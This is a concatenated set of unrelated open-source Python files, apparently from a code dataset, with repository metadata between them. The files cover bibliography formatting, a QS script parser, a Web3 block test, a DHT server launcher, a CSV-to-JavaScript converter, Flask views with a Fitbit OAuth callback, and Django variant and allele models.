help="Set logging level to integer value.")
parser.add_argument("bibfiles", action="store", nargs='*',
help="The .bib files for the references.")
args = parser.parse_args()
if args.logger_level:
bib4txt_logger.setLevel(args.logger_level)
elif 2==args.verbosity:
bib4txt_logger.setLevel(logging.DEBUG)
elif 1==args.verbosity:
bib4txt_logger.setLevel(logging.INFO)
if args.stylefile != "default.py":
bib4txt_logger.info("It is currently recommended to pass styles with the -s option.")
stylename = os.path.splitext(args.stylefile)[0]
else:
stylename = args.style
if "." in stylename:
bib4txt_logger.warn("use the -f option to pass a style by filename")
stylename = os.path.splitext(stylename)[0]
bib4txt_logger.info(
"\n".join([
"Script running:",
" bibfiles=%s",
" infile=%s",
" outfile=%s",
" style=%s"
])%(args.bibfiles, args.infile, args.outfile, stylename)
)
#import a bibliography style based on `stylefile` command-line option
#TODO: add error handling for unknown styles
style = importlib.import_module('bibstuff.bibstyles.%s'%stylename)
"""
str2exec = "import bibstuff.bibstyles.%s as style"%stylename
workaround = {} #work around Python 2 exec vs Python 3 exec
exec(str2exec, {}, workaround)
style = workaround['style']
#exec("import bibstuff.bibstyles.%s as style"%os.path.splitext(args.stylefile)[0])
"""
# open output file for writing (default: stdout)
if args.outfile:
if os.path.exists(args.outfile) and not args.overwrite:
_msg = """ABORTED because output file %s already exists:
Use -n option to nuke (overwrite) this file.
PLEASE CHECK FILE NAME CAREFULLY!
"""%(args.outfile)
print(_msg)
sys.exit(1)
_outfile = open(args.outfile,'w')
# read database (.bib) files
bibfile_names = args.bibfiles
bibfile_as_string = bibfiles2string(bibfile_names)
if not bibfile_as_string:
bib4txt_logger.warning("No BibTeX databases found.")
sys.exit(1)
# read input file (default: stdin)
if args.infile:
try:
_infile = open(args.infile, mode='r', encoding='utf-8')
except TypeError: #Python 2 did not accept encoding arg
_infile = open(args.infile, mode='r')
except:
raise ValueError("Cannot open: "+args.infile)
if args.entire_doc:
ebnf_dec = ebnf_sp.cites_rest
else:
ebnf_dec = ebnf_sp.cites_only_rest
if args.xp_parse:
ebnf_dec = ebnf_sp.cites_xp
# Create a simpleparse.parser Parser based on the chosen grammar
cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src')
# create object to store parsed .bib file
bibfile_processor = bibfile.BibFile()
bib4txt_logger.debug('Ready to parse bib file.')
#store parsed .bib files in the bibfile_processor
bibgrammar.Parse(bibfile_as_string, bibfile_processor)
bib4txt_logger.info('bib file parsed.')
result = make_text_output(
_infile.read(),
cite_parser,
bibfile_processor,
style,
citations_only = not args.entire_doc)
_outfile.write(result)
_outfile.close()
_infile.close()
if __name__ == '__main__':
main()
| 2.53125 | 3 |
pineboolib/flparser/postparse.py | Miguel-J/pineboo-buscar | 0 | 12796589 | <reponame>Miguel-J/pineboo-buscar<filename>pineboolib/flparser/postparse.py<gh_stars>0
#!/usr/bin/python
from builtins import str
from builtins import object
from optparse import OptionParser
import os
import os.path
import sys
import imp
import traceback
from lxml import etree
try:
from pineboolib.flparser import flscriptparse
except ImportError:
import flscriptparse
USEFUL_TOKENS = "ID,ICONST,FCONST,SCONST,CCONST,RXCONST".split(",")
KNOWN_PARSERS = {}
UNKNOWN_PARSERS = {}
def parse_for(*tagnames):
global KNOWN_PARSERS
def decorator(fn):
for n in tagnames:
KNOWN_PARSERS[n] = fn
return fn
return decorator
def parse(tagname, treedata):
global KNOWN_PARSERS, UNKNOWN_PARSERS
if tagname not in KNOWN_PARSERS:
UNKNOWN_PARSERS[tagname] = 1
fn = parse_unknown
else:
fn = KNOWN_PARSERS[tagname]
return fn(tagname, treedata)
def getxmltagname(tagname):
if tagname == "source":
return "Source"
if tagname == "funcdeclaration":
return "Function"
if tagname == "classdeclaration":
return "Class"
if tagname == "vardeclaration":
return "Variable"
return "Unknown.%s" % tagname
xml_class_types = []
class TagObjectFactory(type):
def __init__(cls, name, bases, dct):
global xml_class_types
xml_class_types.append(cls)
super(TagObjectFactory, cls).__init__(name, bases, dct)
class TagObject(object, metaclass=TagObjectFactory):
tags = []
set_child_argn = False
name_is_first_id = False
debug_other = True
adopt_childs_tags = []
omit_tags = ['empty']
callback_subelem = {}
promote_child_if_alone = False
@classmethod
def tagname(self, tagname):
return self.__name__
@classmethod
def can_process_tag(self, tagname):
return tagname in self.tags
def __init__(self, tagname):
self.astname = tagname
self.xml = etree.Element(self.tagname(tagname))
self.xmlname = None
self.subelems = []
self.values = []
if self.name_is_first_id:
self.xml.set("name", "")
def adopt_children(self, argn, subelem):
for child in subelem.xml.iterchildren():
if self.set_child_argn:
child.set("argn", str(argn))
else:
if 'argn' in child.attrib:
del child.attrib['argn']
self.xml.append(child)
def omit_subelem(self, argn, subelem):
return
def is_in(self, listobj):
return self.__class__ in listobj or self.astname in listobj
def get(self, listobj, default=None):
if self.__class__ in listobj:
return listobj[self.__class__]
if self.astname in listobj:
return listobj[self.astname]
return default
def add_subelem(self, argn, subelem):
if subelem.is_in(self.omit_tags):
return self.omit_subelem(argn, subelem)
if subelem.is_in(self.adopt_childs_tags):
return self.adopt_children(argn, subelem)
callback = subelem.get(self.callback_subelem)
if callback:
return getattr(self, callback)(argn, subelem)
if self.set_child_argn:
subelem.xml.set("argn", str(argn))
self.xml.append(subelem.xml)
self.subelems.append(subelem)
def add_value(self, argn, vtype, value):
self.values.append((vtype, value))
if vtype == "ID" and self.name_is_first_id and self.xmlname is None:
self.xmlname = value
self.xml.set("name", value)
return
self.xml.set("arg%02d" % argn, vtype + ":" + repr(value))
def add_other(self, argn, vtype, data):
if self.debug_other:
self.xml.set("arg%02d" % argn, vtype)
def polish(self):
if self.promote_child_if_alone:
if len(self.values) == 0 and len(self.subelems) == 1:
return self.subelems[0]
return self
class ListObject(TagObject):
set_child_argn = False
debug_other = False
class NamedObject(TagObject):
name_is_first_id = True
debug_other = False
class ListNamedObject(TagObject):
name_is_first_id = True
set_child_argn = False
debug_other = False
class TypedObject(ListObject):
type_arg = 0
def add_other(self, argn, vtype, value):
if argn == self.type_arg:
self.xml.set("type", vtype)
class Source(ListObject):
tags = ["source", "basicsource", "classdeclarationsource",
"statement_list", "statement_block"]
adopt_childs_tags = ['source_element',
'statement_list', 'statement', "statement_block"]
class Identifier(NamedObject):
tags = ["identifier", "optid"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class Arguments(ListObject):
tags = ["arglist"]
adopt_childs_tags = ['vardecl_list']
class VariableType(NamedObject):
tags = ["optvartype"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class ExtendsType(NamedObject):
tags = ["optextends"]
def polish(self):
if self.xmlname is None:
self.astname = "empty"
return self
class Function(ListNamedObject):
tags = ["funcdeclaration"]
callback_subelem = ListNamedObject.callback_subelem.copy()
callback_subelem[VariableType] = "add_vartype"
def add_vartype(self, argn, subelem):
self.xml.set("returns", str(subelem.xmlname))
class FunctionAnon(ListObject):
tags = ["funcdeclaration_anon"]
class FunctionAnonExec(ListObject):
tags = ["funcdeclaration_anon_exec"]
class Variable(NamedObject):
tags = ["vardecl"]
callback_subelem = NamedObject.callback_subelem.copy()
callback_subelem[VariableType] = "add_vartype"
def add_vartype(self, argn, subelem):
self.xml.set("type", str(subelem.xmlname))
class DeclarationBlock(ListObject):
tags = ["vardeclaration"]
adopt_childs_tags = ['vardecl_list']
def add_other(self, argn, vtype, value):
if argn == 0:
self.xml.set("mode", vtype)
def polish(self):
# if len(self.values) == 0 and len(self.subelems) == 1:
# self.subelems[0].xml.set("mode",self.xml.get("mode"))
# return self.subelems[0]
return self
class Class(ListNamedObject):
tags = ["classdeclaration"]
callback_subelem = ListNamedObject.callback_subelem.copy()
callback_subelem[ExtendsType] = "add_exttype"
def add_exttype(self, argn, subelem):
self.xml.set("extends", str(subelem.xmlname))
class Member(TagObject):
debug_other = False
set_child_argn = False
tags = ["member_var", "member_call"]
adopt_childs_tags = ['varmemcall', "member_var", "member_call"]
class ArrayMember(TagObject):
debug_other = False
set_child_argn = False
tags = ["array_member"]
adopt_childs_tags = ['variable_1', "func_call"]
class InstructionCall(TagObject):
debug_other = False
tags = ["callinstruction"]
class InstructionStore(TagObject):
promote_child_if_alone = True
debug_other = False
tags = ["storeinstruction"]
class InstructionFlow(TypedObject):
debug_other = True
tags = ["flowinstruction"]
class Instruction(TagObject):
promote_child_if_alone = True
debug_other = False
tags = ["instruction"]
class OpMath(TypedObject):
debug_other = True
tags = ["mathoperator"]
class Compare(TypedObject):
debug_other = True
tags = ["cmp_symbol", "boolcmp_symbol"]
class FunctionCall(NamedObject):
tags = ["funccall_1"]
class CallArguments(ListObject):
tags = ["callargs"]
class Constant(ListObject):
tags = ["constant"]
def add_value(self, argn, vtype, value):
value = str(value) # str(value,"ISO-8859-15","replace")
if vtype == "SCONST":
vtype = "String"
value = value[1:-1]
self.xml.set("delim", '"')
if vtype == "CCONST":
vtype = "String"
value = value[1:-1]
self.xml.set("delim", "'")
if vtype == "RCONST":
vtype = "Regex"
if vtype == "ICONST":
vtype = "Number"
if vtype == "FCONST":
vtype = "Number"
self.const_value = value
self.const_type = vtype
self.xml.set("type", vtype)
self.xml.set("value", value)
class InlineUpdate(ListObject):
tags = ["inlinestoreinstruction"]
def add_other(self, argn, vtype, value):
self.xml.set("type", vtype)
if argn == 0:
self.xml.set("mode", "update-read")
if argn == 1:
self.xml.set("mode", "read-update")
class If(ListObject):
tags = ["ifstatement"]
class Condition(ListObject):
tags = ["condition"]
class Else(ListObject):
tags = ["optelse"]
def polish(self):
if len(self.subelems) == 0:
self.astname = "empty"
return self
class DictObject(ListObject):
tags = ["dictobject_value_elemlist", "dictobject_value"]
adopt_childs_tags = ['dictobject_value_elemlist', "dictobject_value"]
class DictElem(ListObject):
tags = ["dictobject_value_elem"]
class ExpressionContainer(ListObject):
tags = ["expression"]
# adopt_childs_tags = ['base_expression']
def polish(self):
if len(self.values) == 0 and len(self.subelems) == 1:
# if isinstance(self.subelems[0], Constant):
if self.subelems[0].xml.tag == "base_expression":
self.subelems[0].xml.tag = "Expression"
return self.subelems[0]
else:
self.xml.tag = "Value"
return self
class InstructionUpdate(ListObject):
tags = ["updateinstruction"]
class Switch(ListObject):
tags = ["switch"]
adopt_childs_tags = ['case_cblock_list', 'case_block_list']
class CaseList(ListObject):
tags = ["case_block_list"]
adopt_childs_tags = ['case_cblock_list', 'case_block_list']
class Case(ListObject):
tags = ["case_block"]
class CaseDefault(ListObject):
tags = ["case_default"]
class While(ListObject):
tags = ["whilestatement"]
class For(ListObject):
tags = ["forstatement"]
class ForInitialize(ListObject):
tags = ["for_initialize"]
class ForCompare(ListObject):
tags = ["for_compare"]
class ForIncrement(ListObject):
tags = ["for_increment"]
class DoWhile(ListObject):
tags = ["dowhilestatement"]
class ForIn(ListObject):
tags = ["forinstatement"]
class With(ListObject):
tags = ["withstatement"]
class TryCatch(ListObject):
tags = ["trycatch"]
class New(ListObject):
tags = ["new_operator"]
class Delete(ListObject):
tags = ["deleteinstruction"]
class Parentheses(ListObject):
tags = ["parentheses"]
adopt_childs_tags = ['base_expression']
class OpUnary(TypedObject):
tags = ["unary_operator"]
class OpTernary(ListObject):
tags = ["ternary_operator"]
class OpUpdate(TypedObject):
tags = ["updateoperator"]
# ----- keep this one at the end.
class Unknown(TagObject):
promote_child_if_alone = True
set_child_argn = False
@classmethod
def tagname(self, tagname):
return tagname
@classmethod
def can_process_tag(self, tagname):
return True
# -----------------
def create_xml(tagname):
classobj = None
for cls in xml_class_types:
if cls.can_process_tag(tagname):
classobj = cls
break
if classobj is None:
return None
return classobj(tagname)
def parse_unknown(tagname, treedata):
xmlelem = create_xml(tagname)
i = 0
for k, v in treedata['content']:
if type(v) is dict:
instruction = parse(k, v)
xmlelem.add_subelem(i, instruction)
elif k in USEFUL_TOKENS:
xmlelem.add_value(i, k, v)
else:
xmlelem.add_other(i, k, v)
i += 1
return xmlelem.polish()
def post_parse(treedata):
source = parse("source", treedata)
# print UNKNOWN_PARSERS.keys()
return source.xml
class Module(object):
def __init__(self, name, path):
self.name = name
self.path = path
def loadModule(self):
fp = None
try:
description = ('.py', 'U', imp.PY_SOURCE)
# description = ('.pyc', 'U', PY_COMPILED)
pathname = os.path.join(self.path, self.name)
fp = open(pathname)
name = self.name[:self.name.find(".")]
# fp, pathname, description = imp.find_module(self.name,[self.path])
self.module = imp.load_module(name, fp, pathname, description)
result = True
except FileNotFoundError:
print("Fichero %r no encontrado" % self.name)
result = False
except Exception as e:
print(traceback.format_exc())
result = False
if fp:
fp.close()
return result
def parseArgs(argv):
parser = OptionParser()
parser.add_option("-q", "--quiet",
action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
parser.add_option("--optdebug",
action="store_true", dest="optdebug", default=False,
help="debug optparse module")
parser.add_option("--debug",
action="store_true", dest="debug", default=False,
help="prints lots of useless messages")
parser.add_option("--path",
dest="storepath", default=None,
help="store XML results in PATH")
parser.add_option("--topython",
action="store_true", dest="topython", default=False,
help="write python file from xml")
parser.add_option("--exec-py",
action="store_true", dest="exec_python", default=False,
help="try to execute python file")
parser.add_option("--toxml",
action="store_true", dest="toxml", default=False,
help="write xml file from qs")
parser.add_option("--full",
action="store_true", dest="full", default=False,
help="write xml file from qs")
parser.add_option("--cache",
action="store_true", dest="cache", default=False,
help="If dest file exists, don't regenerate it")
(options, args) = parser.parse_args(argv)
return (options, args)
def main():
options, args = parseArgs(sys.argv[1:])
execute(options, args)
def pythonify(filelist):
options, args = parseArgs([])
options.full = True
if isinstance(filelist, str):
filelist = [filelist]
execute(options, filelist)
print(filelist)
def execute(options, args):
if options.optdebug:
print(options, args)
if options.full:
execpython = options.exec_python
options.exec_python = False
options.full = False
options.toxml = True
if options.verbose:
print("Pass 1 - Parse and write XML file . . .")
try:
execute(options, args)
except Exception:
print("Error parseando:")
print(traceback.format_exc())
options.toxml = False
options.topython = True
if options.verbose:
print("Pass 2 - Pythonize and write PY file . . .")
try:
execute(options, [arg + ".xml" for arg in args])
except Exception:
print("Error convirtiendo:")
print(traceback.format_exc())
if execpython:
options.exec_python = execpython
if options.verbose:
print("Pass 3 - Test PY file load . . .")
options.topython = False
try:
execute(
options, [(arg + ".xml.py").replace(".qs.xml.py", ".qs.py") for arg in args])
except Exception:
print("Error al ejecutar Python:")
print(traceback.format_exc())
print("Done.")
elif options.exec_python:
# import qsatype
for filename in args:
realpath = os.path.realpath(filename)
path, name = os.path.split(realpath)
if not os.path.exists(realpath):
print("Fichero no existe: %s" % name)
continue
mod = Module(name, path)
if not mod.loadModule():
print("Error cargando modulo %s" % name)
elif options.topython:
from .pytnyzer import pythonize
import io
if options.cache:
args = [x for x in args if not os.path.exists((x + ".py").replace(".qs.xml.py", ".qs.py")) or
os.path.getmtime(x) > os.path.getctime((x + ".py").replace(".qs.xml.py", ".qs.py"))]
nfs = len(args)
for nf, filename in enumerate(args):
bname = os.path.basename(filename)
if options.storepath:
destname = os.path.join(options.storepath, bname + ".py")
else:
destname = filename + ".py"
destname = destname.replace(".qs.xml.py", ".qs.py")
if not os.path.exists(filename):
print("Fichero %r no encontrado" % filename)
continue
if options.verbose:
sys.stdout.write(
"Pythonizing File: %-35s . . . . (%.1f%%) \r" % (bname, 100.0 * (nf + 1.0) / nfs))
if options.verbose:
sys.stdout.flush()
old_stderr = sys.stdout
stream = io.StringIO()
sys.stdout = stream
try:
pythonize(filename, destname, destname + ".debug")
except Exception:
print("Error al pythonificar %r:" % filename)
print(traceback.format_exc())
sys.stdout = old_stderr
text = stream.getvalue()
if len(text) > 2:
print("%s: " % bname + ("\n%s: " %
bname).join(text.splitlines()))
else:
if options.cache:
args = [x for x in args if not os.path.exists(x + ".xml") or
os.path.getmtime(x) > os.path.getctime(x + ".xml")]
nfs = len(args)
for nf, filename in enumerate(args):
bname = os.path.basename(filename)
if options.verbose:
sys.stdout.write(
"Parsing File: %-35s . . . . (%.1f%%) " % (bname, 100.0 * (nf + 1.0) / nfs))
if options.verbose:
sys.stdout.flush()
try:
filecontent = open(filename, "r", encoding="latin-1").read()
filecontent = flscriptparse.cleanNoPython(filecontent)
except Exception as e:
print("Error: No se pudo abrir fichero %-35s \n" %
(repr(filename)), e)
continue
prog = flscriptparse.parse(filecontent)
sys.stdout.write("\r")
if not prog:
print("Error: No se pudo abrir %-35s \n" %
(repr(filename)))
continue
if prog["error_count"] > 0:
print("Encontramos %d errores parseando: %-35s \n" %
(prog["error_count"], repr(filename)))
continue
if not options.toxml:
# Si no se quiere guardar resultado, no hace falta calcular mas
continue
tree_data = None
try:
tree_data = flscriptparse.calctree(prog, alias_mode=0)
except Exception:
print("Error al convertir a XML %r:" % bname)
print("\n".join(traceback.format_exc().splitlines()[-7:]))
if not tree_data:
print("No se pudo parsear %-35s \n" %
(repr(filename)))
continue
ast = post_parse(tree_data)
if ast is None:
print("No se pudo analizar %-35s \n" %
(repr(filename)))
continue
if options.storepath:
destname = os.path.join(options.storepath, bname + ".xml")
else:
destname = filename + ".xml"
f1 = open(destname, "wb")
f1.write(etree.tostring(ast, pretty_print=True))
f1.close()
if __name__ == "__main__":
main()
| 2.296875 | 2 |
src/libs/Web3Client/tests/testGetBlock.py | JorgePadilla/crabada.py | 0 | 12796590 | <gh_stars>0
from src.common.config import nodeUri
from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client
from pprint import pprint
from src.libs.Web3Client.helpers.debug import pprintAttributeDict
# VARS
client = AvalancheCWeb3Client(nodeUri=nodeUri)
# TEST FUNCTIONS
def test() -> None:
print(">>> LATEST BLOCK")
pprintAttributeDict(client.w3.eth.get_block("latest"))
print(">>> PENDING BLOCK")
pprintAttributeDict(client.w3.eth.get_block("pending"))
# EXECUTE
test()
| 1.835938 | 2 |
runserver.py | pipelinedb/pipelinedht | 15 | 12796591 | #!/usr/bin/env python
from argparse import ArgumentParser
from dht.server import app
if __name__ == '__main__':
parser = ArgumentParser(
description='PiplineDHT -- A simple distributed hash table')
parser.add_argument('-n', '--name', action='store', required=True,
help='name of node')
parser.add_argument('-k', '--host', action='store', default='localhost',
help='hostname to bind to')
parser.add_argument('-p', '--port', action='store', type=int,
required=True, help='port to bind to')
args = parser.parse_args()
app.run(host=args.host, port=args.port)
| 2.625 | 3 |
misc/ConvertOrdersCSVtoJS.py | celstark/MSTonline | 1 | 12796592 | <filename>misc/ConvertOrdersCSVtoJS.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 1 17:05:31 2020
@author: craig
We've been using some online order files in our original PsychoPy-derived
web-based MST. This converts those actual .csv files into the .js ones
we'll be using here
"""
import os, csv, glob
inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders')
outpath=os.path.join("C:",os.sep,"Users","craig","OneDrive - University of California - Irvine","Documents","cordova_cMST","www","jsOrders")
studyfiles=glob.glob(os.path.join(inpath,"MST*p1_o*csv"))
testfiles=glob.glob(os.path.join(inpath,"MST*p2_o*csv"))
for fname in studyfiles:
print(fname)
stim=[]
cond=[]
with open(fname,"r") as infile:
reader=csv.reader(infile,delimiter=',')
next(reader)
for row in reader:
stim.append(row[0])
cond.append(row[1])
infile.close()
outfname=fname.replace('csv','js').replace(inpath,outpath)
outfile=open(outfname,"w")
outfile.write('var trial_stim=[\n')
for i in range(len(cond)):
outfile.write(' {' + "stim: '{0}', cond: '{1}'".format(stim[i],cond[i]) + '}')
if i < (len(cond)-1):
outfile.write(',\n')
else:
outfile.write('\n')
outfile.write(']\n')
outfile.close()
for fname in testfiles:
print(fname)
stim=[]
cond=[]
lbin=[]
corr3=[]
corr2=[]
with open(fname,"r") as infile:
reader=csv.reader(infile,delimiter=',')
next(reader)
for row in reader:
stim.append(row[0])
cond.append(row[1])
lbin.append(row[2])
if row[3]=='v':
corr3.append('0')
corr2.append('0')
elif row[3]=='b':
corr3.append('1')
corr2.append('2')
elif row[3]=='n':
corr3.append('2')
corr2.append('2')
else:
corr3.append('-1')
corr2.append('-1')
infile.close()
outfname=fname.replace('csv','js').replace(inpath,outpath)
outfile=open(outfname,"w")
outfile.write('var trial_stim=[\n')
for i in range(len(cond)):
outfile.write(' {' + "stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}')
if i < (len(cond)-1):
outfile.write(',\n')
else:
outfile.write('\n')
outfile.write(']\n')
outfile.close()
| 2.265625 | 2 |
poketrainer/views.py | hinnefe2/poketrainer | 0 | 12796593 | <gh_stars>0
import base64
import logging
import requests
from flask import redirect, render_template, request, session
from requests_oauthlib import OAuth2Session
from poketrainer.app import flask_app
from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \
FITBIT_CALLBACK_URI
LOGGER = logging.getLogger(__name__)
@flask_app.route('/ui/collection/')
def collection():
pokemon = requests.get(request.host_url + 'api/collection').json()
return render_template('collection.html', pokemon=pokemon)
@flask_app.route('/ui/team/')
def team():
pokemon = requests.get(request.host_url + 'api/team').json()
return render_template('collection.html', pokemon=pokemon)
@flask_app.route('/fitbit_login/')
def fitbit_login():
return _generate_fitbit_token()
@flask_app.route('/fitbitCallback')
def fitbit_callback():
id_secret = (f'{flask_app.config["FITBIT_CLIENT_ID"]}:'
f'{flask_app.config["FITBIT_CLIENT_SECRET"]}')
# see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa
# for why we have to do this base64 stuff
b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8'))
.decode('utf8')
.rstrip())
auth_header = {'Authorization': f'Basic {b64_creds}',
'Content-Type': 'application/x-www-form-urlencoded'}
post_params = {'grant_type': 'authorization_code',
'code': request.args.get('code'),
'redirect_uri': request.host_url + FITBIT_CALLBACK_URI}
# request the actual access token
token = requests.post('https://api.fitbit.com/oauth2/token',
headers=auth_header, params=post_params).json()
LOGGER.debug(token)
# for some reason this fails with 'Missing access token'
# c.f. https://github.com/requests/requests-oauthlib/issues/324
# oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'],
# redirect_uri=request.host_url + '/fitbitCallback/',
# scope=['activity'])
# token = oauth.fetch_token(
# token_url='https://api.fitbit.com/oauth2/token',
# authorization_response=request.url,
# include_client_id=True,
# client_secret=flask_app.config['FITBIT_CLIENT_SECRET'])
session.update(
FITBIT_REFRESH_TOKEN=token['refresh_token'])
return redirect('/ui/collection/')
| 2.234375 | 2 |
snpdb/models/models_variant.py | SACGF/variantgrid | 5 | 12796594 | import collections
import logging
import re
from typing import Optional, Pattern, Tuple, Iterable, Set
import django.dispatch
from django.conf import settings
from django.contrib.auth.models import User
from django.db import models, IntegrityError
from django.db.models import Value as V, QuerySet, F
from django.db.models.deletion import CASCADE, DO_NOTHING
from django.db.models.fields import TextField
from django.db.models.functions import Greatest
from django.db.models.functions.text import Concat
from django.db.models.query_utils import Q, FilteredRelation
from django.dispatch import receiver
from django.urls.base import reverse
from django_extensions.db.models import TimeStampedModel
from lazy import lazy
from model_utils.managers import InheritanceManager
from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos
from flags.models.models import FlagsMixin, FlagTypeContext
from library.django_utils.django_partition import RelatedModelsPartitionModel
from library.genomics import format_chrom
from library.utils import md5sum_str
from snpdb.models import Wiki
from snpdb.models.flag_types import allele_flag_types
from snpdb.models.models_clingen_allele import ClinGenAllele
from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus
from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig
LOCUS_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)$", re.IGNORECASE)
LOCUS_NO_REF_PATTERN = re.compile(r"^([^:]+):(\d+)$")
VARIANT_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)>(=|[GATC]+)$", re.IGNORECASE)
allele_validate_signal = django.dispatch.Signal(providing_args=["allele"])
class Allele(FlagsMixin, models.Model):
""" Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele
This is generally done via ClinGen Allele Registry, but sometimes that can fail.
Linked against Variant with VariantAllele below """
clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele', kwargs={"pk": self.id})
def flag_type_context(self) -> FlagTypeContext:
return FlagTypeContext.objects.get(pk="allele")
@lazy
def clingen_error(self):
error = None
if va := self.variantallele_set.filter(error__isnull=False).first():
error = va.error
return error
def variant_alleles(self):
return self.variantallele_set.order_by("genome_build__name")
@lazy
def grch37(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)
except ValueError:
return None
@lazy
def grch38(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)
except ValueError:
return None
@lazy
def variants(self):
return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))
def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':
vas = self.variant_alleles()
va = None
if genome_build:
va = vas.filter(genome_build=genome_build).first()
if not va and not best_attempt:
raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')
if not va:
va = vas.first()
if va:
return va.variant
raise ValueError(f'Could not find any variants in allele {self.id}')
def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:
""" Used by to write VCF coordinates during liftover. Can be slow (API call)
If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """
from snpdb.models.models_dbsnp import DbSNP
from genes.hgvs import get_hgvs_variant_tuple
# Check if the other build shares existing contig
genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())
for variant_allele in self.variantallele_set.all():
if variant_allele.variant.locus.contig_id in genome_build_contigs:
conversion_tool = AlleleConversionTool.SAME_CONTIG
variant_tuple = variant_allele.variant.as_tuple()
return conversion_tool, variant_tuple
conversion_tool = None
g_hgvs = None
if self.clingen_allele:
try:
g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)
conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY
except ValueError: # Various contig errors all subclass from this
pass
if g_hgvs is None:
if settings.LIFTOVER_DBSNP_ENABLED:
va = self.variantallele_set.all().first()
if va is None:
raise ValueError("Allele contains no VariantAlleles at all! Cannot liftover")
dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)
if dbsnp:
g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)
conversion_tool = AlleleConversionTool.DBSNP
variant_tuple = None
if g_hgvs:
variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)
return conversion_tool, variant_tuple
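    # Illustrative sketch (the names here are assumptions, not part of the module) of how a
    # liftover pipeline could use get_liftover_variant_tuple() to build a VCF line with
    # the Allele primary key in the ID column, as described on the Liftover model below:
    #
    #   conversion_tool, variant_tuple = allele.get_liftover_variant_tuple(GenomeBuild.grch38())
    #   if variant_tuple is not None:
    #       chrom, position, ref, alt = variant_tuple
    #       vcf_record = f"{chrom}\t{position}\t{allele.pk}\t{ref}\t{alt}"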
def merge(self, conversion_tool, other_allele: "Allele") -> bool:
""" Merge other_allele into this allele """
if self == other_allele:
raise ValueError(f"Attempt to merge {self} to itself!")
can_merge = True
merge_log_message = f"{other_allele} merge into {self}"
other_clingen_allele = other_allele.clingen_allele
if other_clingen_allele and self.clingen_allele:
can_merge = False
merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!"
AlleleMergeLog.objects.create(old_allele=other_allele,
new_allele=self,
conversion_tool=conversion_tool,
success=can_merge,
message=merge_log_message)
if can_merge:
if other_clingen_allele:
# Move across ClinGen Allele (may not have been possible to retrieve in all builds, but at least one
# links there, and can't have another, so it'll work)
other_allele.clingen_allele = None
other_allele.save()
self.clingen_allele = other_clingen_allele
self.save()
if other_fc := other_allele.flag_collection:
other_fc.flag_set.update(collection=self.flag_collection_safe)
other_fc.flagwatch_set.update(flag_collection=self.flag_collection)
existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True)
other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)
other_fc.classification_set.update(flag_collection=self.flag_collection)
existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True)
other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)
for va in other_allele.variantallele_set.all():
try:
va.allele = self
va.conversion_tool = conversion_tool
va.save()
except IntegrityError:
logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one",
va.allele, va.genome_build, va.variant)
va.delete()
return can_merge
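    # Minimal usage sketch for merge() (illustrative only - assumes kept_allele and
    # duplicate_allele were found to represent the same change, e.g. via ClinGen):
    #
    #   kept_allele.merge(AlleleConversionTool.CLINGEN_ALLELE_REGISTRY, duplicate_allele)
    #   # VariantAlleles, flags and clinical contexts from duplicate_allele now point at
    #   # kept_allele, and an AlleleMergeLog row records whether the merge succeeded.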
@property
def build_names(self) -> str:
return ", ".join(sorted(self.variantallele_set.values_list("genome_build__name", flat=True)))
def __str__(self):
name = f"Allele {self.pk}"
if self.clingen_allele:
name += f" ({self.clingen_allele})"
return name
def __format__(self, format_spec: str):
        if format_spec == 'CA' and (clingen_allele := self.clingen_allele):
            return str(clingen_allele)
else:
return f"Allele {self.pk}"
def validate(self, liftover_complete=True):
"""
:param liftover_complete: If False does not check for missing representations
"""
if liftover_complete:
v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()
v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()
if v37:
self.close_open_flags_of_type(allele_flag_types.missing_37)
else:
